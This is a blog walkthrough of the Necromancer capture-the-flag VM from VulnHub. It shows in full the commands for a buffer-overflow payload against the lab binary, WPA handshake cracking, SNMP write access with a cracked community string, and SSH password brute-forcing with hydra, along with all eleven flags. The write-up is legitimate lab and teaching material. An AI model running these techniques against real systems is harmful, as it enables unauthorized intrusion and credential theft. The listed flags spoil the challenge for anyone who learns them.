Necromancer VM
So this might be a thing now? Writing about vulneable VM’s from vulnhub.com? Let us see…
I recently collaborated (of sorts) in tackling the MrRobot VM with a friend of mine, Leigh Hall. This time we have decided to take a look at Necromancer. Here’s his write-up.
There are 11 flags to be collected in this particular VM.
So as with MrRobot, I’ve fired up the VM and Kali on top of Ubuntu.
Step 1: Enumerate
root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.56.1 0a:00:27:00:00:15 (Unknown)
192.168.56.100 08:00:27:d7:b8:ae CADMUS COMPUTER SYSTEMS
192.168.56.102 08:00:27:de:4e:19 CADMUS COMPUTER SYSTEMS3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 3.197 seconds (80.08 hosts/sec). 3 responded
Next came the scanning
nmap — ANY COMBINATIONNo matter what combination of nmap switches I used would give me anything but 'filtered' ports. I also feel like I tried every combination going. I wasted a LONG time on this, but on the positive side I won't need to consult the man page ever again.
I was discussing my inability to perform a scan with a friend of mine and he became suspicious, asking about the validity of the VM and it’s source. I assured him of it’s validity, but this made me wonder, is the box actually calling out?
I fired up WireShark to watch the traffic, lo and behold, it was intermittently broadcasting out to everything on it’s network on port 4444.
Next thing to do was clearly have a listen then!
root@kali:~# nc -nvlp 4444
listening on [any] 4444 …
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 16416
…V2VsY29tZSENCg0KWW91IGZpbmQgeW91cnNlbGYgc3RhcmluZyB0b3dhcmRzIHRoZSBob3Jpem9uLCB3aXRoIG5vdGhpbmcgYnV0IHNpbGVuY2Ugc3Vycm91bmRpbmcgeW91Lg0KWW91IGxvb2sgZWFzdCwgdGhlbiBzb3V0aCwgdGhlbiB3ZXN0LCBhbGwgeW91IGNhbiBzZWUgaXMgYSBncmVhdCB3YXN0ZWxhbmQgb2Ygbm90aGluZ25lc3MuDQoNClR1cm5pbmcgdG8geW91ciBub3J0aCB5b3Ugbm90aWNlIGEgc21hbGwgZmxpY2tlciBvZiBsaWdodCBpbiB0aGUgZGlzdGFuY2UuDQpZb3Ugd2FsayBub3J0aCB0b3dhcmRzIHRoZSBmbGlja2VyIG9mIGxpZ2h0LCBvbmx5IHRvIGJlIHN0b3BwZWQgYnkgc29tZSB0eXBlIG9mIGludmlzaWJsZSBiYXJyaWVyLiAgDQoNClRoZSBhaXIgYXJvdW5kIHlvdSBiZWdpbnMgdG8gZ2V0IHRoaWNrZXIsIGFuZCB5b3VyIGhlYXJ0IGJlZ2lucyB0byBiZWF0IGFnYWluc3QgeW91ciBjaGVzdC4gDQpZb3UgdHVybiB0byB5b3VyIGxlZnQuLiB0aGVuIHRvIHlvdXIgcmlnaHQhICBZb3UgYXJlIHRyYXBwZWQhDQoNCllvdSBmdW1ibGUgdGhyb3VnaCB5b3VyIHBvY2tldHMuLiBub3RoaW5nISAgDQpZb3UgbG9vayBkb3duIGFuZCBzZWUgeW91IGFyZSBzdGFuZGluZyBpbiBzYW5kLiAgDQpEcm9wcGluZyB0byB5b3VyIGtuZWVzIHlvdSBiZWdpbiB0byBkaWcgZnJhbnRpY2FsbHkuDQoNCkFzIHlvdSBkaWcgeW91IG5vdGljZSB0aGUgYmFycmllciBleHRlbmRzIHVuZGVyZ3JvdW5kISAgDQpGcmFudGljYWxseSB5b3Uga2VlcCBkaWdnaW5nIGFuZCBkaWdnaW5nIHVudGlsIHlvdXIgbmFpbHMgc3VkZGVubHkgY2F0Y2ggb24gYW4gb2JqZWN0Lg0KDQpZb3UgZGlnIGZ1cnRoZXIgYW5kIGRpc2NvdmVyIGEgc21hbGwgd29vZGVuIGJveC4gIA0KZmxhZzF7ZTYwNzhiOWIxYWFjOTE1ZDExYjlmZDU5NzkxMDMwYmZ9IGlzIGVuZ3JhdmVkIG9uIHRoZSBsaWQuDQoNCllvdSBvcGVuIHRoZSBib3gsIGFuZCBmaW5kIGEgcGFyY2htZW50IHdpdGggdGhlIGZvbGxvd2luZyB3cml0dGVuIG9uIGl0LiAiQ2hhbnQgdGhlIHN0cmluZyBvZiBmbGFnMSAtIHU2NjYi…which when decode as base64 is:
Welcome!You find yourself staring towards the horizon, with nothing but silence surrounding you.
You look east, then south, then west, all you can see is a great wasteland of nothingness.Turning to your north you notice a small flicker of light in the distance.
You walk north towards the flicker of light, only to be stopped by some type of invisible barrier.The air around you begins to get thicker, and your heart begins to beat against your chest.
You turn to your left.. then to your right! You are trapped!You fumble through your pockets.. nothing!
You look down and see you are standing in sand.
Dropping to your knees you begin to dig frantically.As you dig you notice the barrier extends underground!
Frantically you keep digging and digging until your nails suddenly catch on an object.You dig further and discover a small wooden box.
flag1{e6078b9b1aac915d11b9fd59791030bf} is engraved on the lid.You open the box, and find a parchment with the following written on it. “Chant the string of flag1 — u666”
So chanting the string of flag u666 would mean to pass the string to port 666 and we can assume the u indicates via UDP
root@kali:~# echo “e6078b9b1aac915d11b9fd59791030bf” | nc -u 192.168.56.102 666
Chant had no affect! Try in a different tongue!A different tongue? Well it looks like an MD5, a quick search later and we find it is the MD5 for "opensesame"
root@kali:~# echo "opensesame" | nc -u 192.168.56.102 666A loud crack of thunder sounds as you are knocked to your feet!Dazed, you start to feel fresh air entering your lungs.You are free!In front of you written in the sand are the words:flag2{c39cd4df8f2e35d20d92c2e44de5f7c6}As you stand to your feet you notice that you can no longer see the flicker of light in the distance.You turn frantically looking in all directions until suddenly, a murder of crows appear on the horizon.As they get closer you can see one of the crows is grasping on to an object. As the sun hits the object, shards of light beam from its surface.The birds get closer, and closer, and closer.Staring up at the crows you can see they are in a formation.Squinting your eyes from the light coming from the object, you can see the formation looks like the numeral 80.As quickly as the birds appeared, they have left you once again.... alone... tortured by the deafening sound of silence.666 is closed.
Again the flag looks like an MD5 and it decodes to “1033750779”
The ‘story’ indicates that 80 is the way to go
root@kali:~# nmap 192.168.56.102 -p 80Starting Nmap 7.01 ( https://nmap.org ) at 2016–07–27 07:20 EDT
Nmap scan report for 192.168.56.102
Host is up (0.00046s latency).
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:DE:4E:19 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 13.71 seconds
Browsing to our newly opened port we get a web page contain the following text:
Hours have passed since you first started to follow the crows.Silence continues to engulf you as you treck towards a mountain range on the horizon.More times passes and you are now standing in front of a great chasm.Across the chasm you can see a necromancer standing in the mouth of a cave, staring skyward at the circling crows.As you step closer to the chasm, a rock dislodges from beneath your feet and falls into the dark depths.The necromancer looks towards you with hollow eyes which can only be described as death.He smirks in your direction, and suddenly a bright light momentarily blinds you.The silence is broken by a blood curdling screech of a thousand birds, followed by the necromancers laughs fading as he decends into the cave!The crows break their formation, some flying aimlessly in the air; others now motionless upon the ground.The cave is now protected by a gaseous blue haze, and an organised pile of feathers lay before you.
A quick look at the source code revealed nothing of interest. The pics folder from /pics/pileoffeathers.jpg folder being forbidden and this the only link in the source.
Let’s scan it for signatures with binwalk
root@kali:~/necromancer# binwalk -B pileoffeathers.jpgDECIMAL HEXADECIMAL DESCRIPTION
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
0 0x0 JPEG image data, EXIF standard
12 0xC TIFF image data, little-endian offset of first image directory: 8
270 0x10E Unix path: /www.w3.org/1999/02/22-rdf-syntax-ns#”> <rdf:Description rdf:about=”” xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM=”http
36994 0x9082 Zip archive data, at least v2.0 to extract, compressed size: 121, uncompressed size: 125, name: feathers.txt
37267 0x9193 End of Zip archive
So it contains a ZIP file which itself contains a text file.
Shoving the file through ‘foremost’ exports the following.
root@kali:~/necromancer# foremost pileoffeathers.jpg
Processing: pileoffeathers.jpg
|foundat=feathers.txtUT
*|The text file!
Browsing to the file and reading the txt file:
ZmxhZzN7OWFkM2Y2MmRiN2I5MWMyOGI2ODEzNzAwMDM5NDYzOWZ9IC0gQ3Jvc3MgdGhlIGNoYXNtIGF0IC9hbWFnaWNicmlkZ2VhcHBlYXJzYXR0aGVjaGFzbQ==Which is clearly base64 and decodes to:
root@kali:~/necromancer/output# echo “ZmxhZzN7OWFkM2Y2MmRiN2I5MWMyOGI2ODEzNzAwMDM5NDYzOWZ9IC0gQ3Jvc3MgdGhlIGNoYXNtIGF0IC9hbWFnaWNicmlkZ2VhcHBlYXJzYXR0aGVjaGFzbQ==” | base64 -d
flag3{9ad3f62db7b91c28b68137000394639f} — Cross the chasm at /amagicbridgeappearsatthechasmAgain the flag is an MD5 decoding to “345465869”
Browsing to the URI we get the following text and image
You cautiously make your way across chasm.You are standing on a snow covered plateau, surrounded by shear cliffs of ice and stone.The cave before you is protected by some sort of spell cast by the necromancer.You reach out to touch the gaseous blue haze, and can feel life being drawn from your soul the closer you get.Hastily you take a few steps back away from the cave entrance.There must be a magical item that could protect you from the necromancer’s spell.
As with the previous page there is a link for the image, the only difference between this and the previous image was the source being “../pics” as opposed to just “/pics”. However this turned out to be nothing more than an idiosyncrasy of how the VM was built.
Binwalk again?
root@kali:~/necromancer# binwalk -B magicbook.jpgDECIMAL HEXADECIMAL DESCRIPTION
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
0 0x0 JPEG image data, JFIF standard 1.01
Nope, just a JPEG..
Steganography? I like Stegsolve…
Here’s a script to install it for yourselves, if you want.
#!/bin/bashwget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar
chmod +x stegsolve.jar
mkdir bin
mv stegsolve.jar bin/
Did it help? Not one bit…
Eventually, after much frustration I gave up and asked for a hint on the vulnhub irc channel, the hint I got was;
the hint I would give you is make a list of all magical items
A leap of logic later and I think I need to bruteforce based on a wordlist of ‘magical items’. Google for magic items list gave me http://www.d20srd.org/indexes/magicItems.htm
root@kali:~/necromancer# wget http://www.d20srd.org/indexes/magicItems.htm > items.txt
— 2016–07–28 07:05:20 — http://www.d20srd.org/indexes/magicItems.htm
Resolving www.d20srd.org (www.d20srd.org)... 199.195.199.36
Connecting to www.d20srd.org (www.d20srd.org)|199.195.199.36|:80... connected.
HTTP request sent, awaiting response… 200 OK
Length: 58377 (57K) [text/html]
Saving to: ‘magicItems.htm’magicItems.htm 100%[=================================================================================>] 57.01K 215KB/s in 0.3s2016–07–28 07:05:20 (215 KB/s) — ‘magicItems.htm’ saved [58377/58377]root@kali:~/necromancer# cat magicItems.htm | sort | uniq > items.txt
This failed spectacularly. Started searching for generating your own wordlists. Crunch popped up as something that looks interesting for generating lists but not applicable in this instance:
Then I came across CeWL:
https://digi.ninja/projects/cewl.php
I used this to make my word list off the same website as above:
root@kali:~/necromancer# cewl — depth 0 -m 4 -w magic.txt -v http://www.d20srd.org/indexes/magicItems.htm
CeWL 5.1 Robin Wood (robin@digi.ninja) (http://digi.ninja)Starting at http://www.d20srd.org/indexes/magicItems.htm
Visiting: http://www.d20srd.org/indexes/magicItems.htm, got response code 200
Attribute text found:
The Hypertext d20 SRD — the ultimate d20 system reference Hypertext d20 SRD menu icon Extras icon d20 System menu icon BoLS menu icon Quantcast ExtrasWords found
Then a sort and dedup:
cat magic.txt | sort | uniq > magit.txtThen belt and braces to convert the list to lowercase:
cat magit.txt > tr A-Z a-z > thing.txtand finally throw the list at the website:
root@kali:~/necromancer# wfuzz -c -z file,/root/necromancer/thing.txt — hc 404 http://192.168.56.102/amagicbridgeappearsatthechasm/FUZZ
********************************************************
* Wfuzz 2.1.3 — The Web Bruteforcer *
********************************************************Target: http://192.168.56.102/amagicbridgeappearsatthechasm/FUZZ
Total requests: 752==================================================================
ID Response Lines Word Chars Request
==================================================================00692: C=200 9 L 109 W 9676 Ch “talisman”
…”Total time: 9.233639
Processed Requests: 752
Filtered Requests: 751
Requests/sec.: 81.44134
and a quick browse to ‘talisman’ later and we get:
Downloading and taking a look:
root@kali:~/necromancer# file talisman
talisman: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=2b131df906087adf163f8cba1967b3d2766e639d, not strippedOkay, lets run it:
root@kali:~/necromancer# ./talisman
bash: ./talisman: No such file or directoryAhh yeah 32bit architecture…. to fix this issue on
sudo dpkg --add-architecture i386Then
sudo apt-get update
sudo apt-get install libc6:i386 libncurses5:i386 libstdc++6:i386and now…..
root@kali:~/necromancer# ./talisman
You have found a talisman.The talisman is cold to the touch, and has no words or symbols on it’s surface.Do you want to wear the talisman? YesNothing happens.
So now we have a working binary, lets try overflow it to identify the buffer..
root@kali:~/necromancer# python -c ‘print “A”*32’ | ./talisman
You have found a talisman.The talisman is cold to the touch, and has no words or symbols on it’s surface.Do you want to wear the talisman?
Nothing happens.Segmentation fault
So it cause a segmentation fault we need to pass the binary 32 characters.
Firing up GDB and investigating the functions:
(gdb) info functions
All defined functions:....snip
0x08048529 wearTalisman
0x08048a13 main
0x08048a37 chantToBreakSpell
....snip
Proving the things and the stuff
Passing the program 32 chars from GDB gives a Segfault — 0x08048a0e in wearTalisman ()
[Inferior 1 (process 19811) exited normally]
(gdb) r
Starting program: /root/necromancer/talisman aaaaa
You have found a talisman.The talisman is cold to the touch, and has no words or symbols on it’s surface.Do you want to wear the talisman? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANothing happens.Program received signal SIGSEGV, Segmentation fault.
0x08048a0e in wearTalisman ()
Making it 36 chars results in the following
[Inferior 1 (process 19813) exited normally]
(gdb) r
Starting program: /root/necromancer/talisman
You have found a talisman.The talisman is cold to the touch, and has no words or symbols on it’s surface.Do you want to wear the talisman? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANothing happens.Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)
So here we can see the hex for AAAA meaning the EIP is at chars 33–36.
let’s create the payload:
root@kali:~/necromancer# python -c ‘print “A”*32 + “\x37\x8a\x04\x08”’ > overflow.txtUsing little endian addressing I’ve pointed at the identified function of ‘chantToBreakSpell’
root@kali:~/necromancer# gdb talisman(gdb) r <overflow.txt
Starting program: /root/necromancer/talisman <overflow.txt
You have found a talisman.The talisman is cold to the touch, and has no words or symbols on it’s surface.Do you want to wear the talisman?
Nothing happens.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
You fall to your knees.. weak and weary.
Looking up you can see the spell is still protecting the cave entrance.
The talisman is now almost too hot to touch!
Turning it over you see words now etched into the surface:
flag4{ea50536158db50247e110a6c89fcf3d3}
Chant these words at u31337
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!Program received signal SIGSEGV, Segmentation fault.
0xf7fb3300 in ?? () from /lib/i386-linux-gnu/libc.so.6
And thank goodness for that, I spent an obscene amount of time on this one.
This flag decoded to blackmagic
root@kali:~/necromancer# echo “blackmagic” | nc -u 192.168.56.102 31337As you chant the words, a hissing sound echoes from the ice walls.The blue aura disappears from the cave entrance.You enter the cave and see that it is dimly lit by torches; shadows dancing against the rock wall as you descend deeper and deeper into the mountain.You hear high pitched screeches coming from within the cave, and you start to feel a gentle breeze.The screeches are getting closer, and with it the breeze begins to turn into an ice cold wind.Suddenly, you are attacked by a swarm of bats!You aimlessly thrash at the air in front of you!The bats continue their relentless attack, until…. silence.Looking around you see no sign of any bats, and no indication of the struggle which had just occurred.Looking towards one of the torches, you see something on the cave wall.You walk closer, and notice a pile of mutilated bats lying on the cave floor. Above them, a word etched in blood on the wall./thenecromancerwillabsorbyoursoulflag5{0766c36577af58e15545f099a3b15e60}
Which decodes to 809472671
Browsing to the URI above greets you with
flag6{b1c3ed8f1db4258e4dcb0ce565f6dc03}You continue to make your way through the cave.In the distance you can see a familiar flicker of light moving in and out of the shadows.As you get closer to the light you can hear faint footsteps, followed by the sound of a heavy door opening.You move closer, and then stop frozen with fear.It’s the necromancer!
Again he stares at you with deathly hollow eyes.He is standing in a doorway; a staff in one hand, and an object in the other.Smirking, the necromancer holds the staff and the object in the air.He points his staff in your direction, and the stench of death and decay begins to fill the air.You stare into his eyes and then…….…… darkness. You open your eyes and find yourself lying on the damp floor of the cave.The amulet must have saved you from whatever spell the necromancer had cast.You stand to your feet. Behind you, only darkness.Before you, a large door with the symbol of a skull engraved into the surface.Looking closer at the skull, you can see u161 engraved into the forehead.
The flag decodes as: 1756462165
Necromancer is a link: clicking it gives us another BIN file
Lets confirm the file type:
root@kali:~/necromancer# file necromancer
necromancer: bzip2 compressed data, block size = 900kSo it's a bzip2 file
root@kali:~/necromancer# mv necromancer necromancer.bz2
root@kali:~/necromancer# bzip2 -dk necromancer.bz2
root@kali:~/necromancer# file necromancer
necromancer: POSIX tar archive (GNU)which unzips to a TAR file
root@kali:~/necromancer# tar -xvf necromancer
necromancer.capWhich unzips to a cap file, when opened with WireShark this looks like the capture of some wireless traffic.
filtering on
wlan.fc.type==2We can see the four way hand shake…
lets decrypt it with aircrack-ng
root@kali:~/Documents/necro# aircrack-ng necromancer.cap -w /usr/share/wordlists/termineter.txtI started with the default word lists in Kali. Termineter.txt didn’t give me a result. Rockyou.txt on the other hand….
root@kali:~/Documents/necro# aircrack-ng necromancer.cap -w /usr/share/wordlists/rockyou.txt
Opening necromancer.cap
Read 2197 packets.# BSSID ESSID Encryption1 C4:12:F5:0D:5E:95 community WPA (1 handshake)Choosing first network as target.Opening necromancer.cap
Reading packets, please wait…Aircrack-ng 1.2 rc3[00:00:14] 16092 keys tested (1183.19 k/s)KEY FOUND! [ death2all ]Master Key : 7C F8 5B 00 BC B6 AB ED B0 53 F9 94 2D 4D B7 AC
DB FA 53 6F A9 ED D5 68 79 91 84 7B 7E 6E 0F E7Transient Key : EB 8E 29 CE 8F 13 71 29 AF FF 04 D7 98 4C 32 3C
56 8E 6D 41 55 DD B7 E4 3C 65 9A 18 0B BE A3 B3
C8 9D 7F EE 13 2D 94 3C 3F B7 27 6B 06 53 EB 92
3B 10 A5 B0 FD 1B 10 D4 24 3C B9 D6 AC 23 D5 7DEAPOL HMAC : F6 E5 E2 12 67 F7 1D DC 08 2B 17 9C 72 42 71 8E
So now we have a string we can revisit the original text.
Looking closer at the skull, you can see u161 engraved into the forehead.So passing the string to port 161 via udp… didn’t work. Previously we have had to pass strings in different ‘tongues’. Neither MD5 and Base64 worked either…
What does NMAP say?
root@kali:~/necromancer# nmap -sU 192.168.56.106 -p 161Starting Nmap 7.01 ( https://nmap.org ) at 2016–07–29 04:42 EDT
Nmap scan report for 192.168.56.106
Host is up (0.0014s latency).
PORT STATE SERVICE
161/udp open|filtered snmp
hmmmmm…. so it’s open but filtering, maybe this is why I am not getting a response? Time to start reading:
I came across the following except from https://nmap.org/book/man-port-scanning-techniques.html
UDP scan works by sending a UDP packet to every targeted port. For some common ports such as 53 and 161, a protocol-specific payload is sent to increase response rate, but for most ports the packet is empty unless the — data, — data-string, or — data-length options are specified. If an ICMP port unreachable error (type 3, code 3) is returned, the port is closed. Other ICMP unreachable errors (type 3, codes 0, 1, 2, 9, 10, or 13) mark the port asfiltered. Occasionally, a service will respond with a UDP packet, proving that it is open. If no response is received after retransmissions, the port is classified as open|filtered. This means that the port could be open, or perhaps packet filters are blocking the communication. Version detection (-sV) can be used to help differentiate the truly open ports from the filtered ones.
protocol specific?
161 — udp — SNMP -Simple network management protocol (SNMP).
Used by various devices and applications (including firewalls and routers) to communicate logging and management information with remote monitoring applications.
Typically, SNMP agents listen on UDP port 161, asynchronous traps are received on port 162.
So it looks like I need to send a protocol specific packet containing the password to 161. Google search for “send snmp trap linux command line”. The second result being http://linuxcommand.org/man_pages/snmptrap1.html
I proceeded to spend the next two days getting nothing out the box other than timeout messages. Eventually after speaking to Leigh Hall it became apparent I was doing everything correctly, it was just being uncooperative. Massively, fucking uncooperative.
After 2 days of trying to get the thing to work via every method I could think of, including reinstalling both my Kali VM and the Necromancer VM, I finally got pissed off fired up a different laptop and installed it all again but this time in VMWare Player 12 and not VirtualBox
Guess what?
msf > use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(snmp_enum) > set RHOSTS 172.16.26.128
RHOSTS => 172.16.26.128
msf auxiliary(snmp_enum) > set COMMUNITY death2all
COMMUNITY => death2all
msf auxiliary(snmp_enum) > run[+] 172.16.26.128, Connected.[*] System information:Host IP : 172.16.26.128
Hostname : Fear the Necromancer!
Description : You stand in front of a door.
Contact : The door is Locked. If you choose to defeat me, the door must be Unlocked.
Location : Locked — death2allrw!
Uptime snmp : -
Uptime system : -
System date : -
I’ll be coming back to this to try figure out why I wasted two days.. but first…
Contact : The door is Locked. If you choose to defeat me, the door must be Unlocked.
Location : Locked — death2allrw! This to me read that the Location string needed to be modified from Locked to Unlocked.
At this stage we don’t actually know the location of Location to even try amend the string.
snroot@kali:~# snmpwalk -c "death2allrw" -v 1 172.16.26.128 | grep Locked
iso.3.6.1.2.1.1.4.0 = STRING: "The door is Locked. If you choose to defeat me, the door must be Unlocked."
iso.3.6.1.2.1.1.6.0 = STRING: "Locked - death2allrw!"A quick snmpwalk + grep and we now know we are amending
iso.3.6.1.2.1.1.6.0As I had spent two days messing around with SNMPtrap/set/walk/snmp_enum I knew that snmpset was the tool for the job (they mostly share the same syntax and commands).
snmpset -c “death2allrw” -v 1 172.16.26.128 iso.3.6.1.2.1.1.6.0 s “Unlocked”- -c is the community string identified in the use of snmp_enum in metasploit
- -v is the version, there are 3 versions of snmp and the syntax varies wildly depending on which one you are using
- s is saying ‘this is the string we are going to be passing into the location, which is the numeric(ish) string before the s.
root@kali:~# snmpwalk -c “death2allrw” -v 1 172.16.26.128 | grep flag
iso.3.6.1.2.1.1.6.0 = STRING: “flag7{9e5494108d10bbd5f9e7ae52239546c4} — t22”I’m lazy and we know our flags have the word flag in them so grep to the rescue to stop me combing through all the output…. As with all the other flags, it’s an MD5, this time: demonslayer. t22, tcp to port 22…. ssh
but just to be sure
root@kali:~# echo “demonslayer” | nc 172.16.26.128 22
SSH-2.0-OpenSSH_7.2
Protocol mismatch.Yep ssh. So going out on a limb, based on theme of the VM and the last flag… user name? Password? Well we don’t have one of them that so let's try some of the default word lists in Kali
root@kali:~# hydra -l root -P /usr/share/wordlists/rockyou.txt 172.16.26.128 sshThis didn’t work, the reason is because I’m an idiot. I tried several word lists before I realised my sleep deprived brain had started replacing demonslayer with root. Read into that ‘autopilot mistake’ what you will.
Going back and trying default wordlists again but with the ‘correct’ user name I almost instantly got
[22][ssh] host: 172.16.26.128 login: demonslayer password: 12345678So…
root@kali:~# ssh demonslayer@172.16.26.128
demonslayer@172.16.26.128's password:## ASCII ART REMOVED AND PUT AT THE TOP OF THE PAGE AS A NICE FANCY TITLE IMAGE##
THE NECROMANCER!
by @xerubus$ whoami
demonslayer
$ pwd
/home/demonslayer
$ ls
flag8.txt
$ cat flag8.txt
You enter the Necromancer’s Lair!A stench of decay fills this place.Jars filled with parts of creatures litter the bookshelves.A fire with flames of green burns coldly in the distance.Standing in the middle of the room with his back to you is the Necromancer.In front of him lies a corpse, indistinguishable from any living creature you have seen before.He holds a staff in one hand, and the flickering object in the other.“You are a fool to follow me here! Do you not know who I am!”The necromancer turns to face you. Dark words fill the air!“You are damned already my friend. Now prepare for your own death!”Defend yourself! Counter attack the Necromancer’s spells at u777!
Okay then!
$ nc -u localhost 777** You only have 3 hitpoints left! **Defend yourself from the Necromancer’s Spells!Where do the Black Robes practice magic of the Greater Path? Kelewanflag8{55a6af2ca3fee9f2fef81d20743bda2c}
This brought a bit of a smile to my face as Magician (the Rift War Series) was the first ever fantasy novel I read and the one that got me hooked on the genre.
Decodes to: Kelewan
** You only have 3 hitpoints left! **Defend yourself from the Necromancer’s Spells!Who did Johann Faust VIII make a deal with? mephistophelesflag9{713587e17e796209d1df4c9c2c2d2966}
No idea who or what this is beyond Anime reference
Decodes to: Mephistopheles (there’s a theme developing)
** You only have 3 hitpoints left! **Defend yourself from the Necromancer’s Spells!Who is tricked into passing the Ninth Gate? Hedgeflag10{8dc6486d2c63cafcdc6efbba2be98ee4}
Decodes to: Hedge (Shocker)
A great flash of light knocks you to the ground; momentarily blinding you!As your sight begins to return, you can see a thick black cloud of smoke lingering where the Necromancer once stood.An evil laugh echoes in the room and the black cloud begins to disappear into the cracks in the floor.The room is silent.You walk over to where the Necromancer once stood.On the ground is a small vile.
Hmmmmm
$ ls
flag8.txtNothing new in the folder…. or is there?
$ find .
.
./.ssh
./.ssh/authorized_keys
./.Xdefaults
./.cshrc
./.cvsrc
./.login
./.mailrc
./.profile
./flag8.txt
./.smallvileAha! .smallvile
$ cat .smallvileYou pick up the small vile.Inside of it you can see a green liquid.Opening the vile releases a pleasant odour into the air.You drink the elixir and feel a great power within your veins!
$ su — root
Password:
you are not in group wheelOh, so what am I in?
$ sudo -l
Matching Defaults entries for demonslayer on thenecromancer:
env_keep+=”FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK”User demonslayer may run the following commands on thenecromancer:
(ALL) NOPASSWD: /bin/cat /root/flag11.txt
Aha!
$ cat /root/flag11.txt
cat: /root/flag11.txt: Permission deniedBoooo! Hissss!
$ sudo cat /root/flag11.txtSuddenly you feel dizzy and fall to the ground!As you open your eyes you find yourself staring at a computer screen.Congratulations!!! You have conquered……
THE NECROMANCER!
by @xerubusflag11{42c35828545b926e79a36493938ab1b1}Big shout out to Dook and Bull for being test bunnies.Cheers OJ for the obfuscation help.Thanks to SecTalks Brisbane and their sponsors for making these CTF challenges possible.“=========================================”
“ xerubus (@xerubus) — www.mogozobo.com “
“=========================================”$
Yay and things. This VM has frustrated me beyond reason on two separate issues. I wasn’t a big fan of the magical items word list, although I can see the logic in hindsight it just felt ‘out of place’ as a challenge with the rest of the VM. Secondly on the bloody SNMP issue. Which I have now figured out, and it’s beyond irritating. The first thing I did when I got to the /thenecromancerwillabsorbyoursoul URI was check the source code, from the source code I clicked the link which gave me the binary file. On ALL OTHER attempts to resolve the SNMP issue and walk through the entire thing I either typed /necromancer or used the history to browse to the unzipped cap file. It turns out you HAVE TO CLICK THE LINK ON THE PAGE. It must do something in the background to open port u161. Bastard!
Before:
Nmap scan report for 192.168.56.101
Host is up (0.00045s latency).
PORT STATE SERVICE
161/udp open/filtered snmpAfter:
Nmap scan report for 192.168.56.101
Host is up (0.00045s latency).
PORT STATE SERVICE
161/udp open snmpAnyways… cool VM.
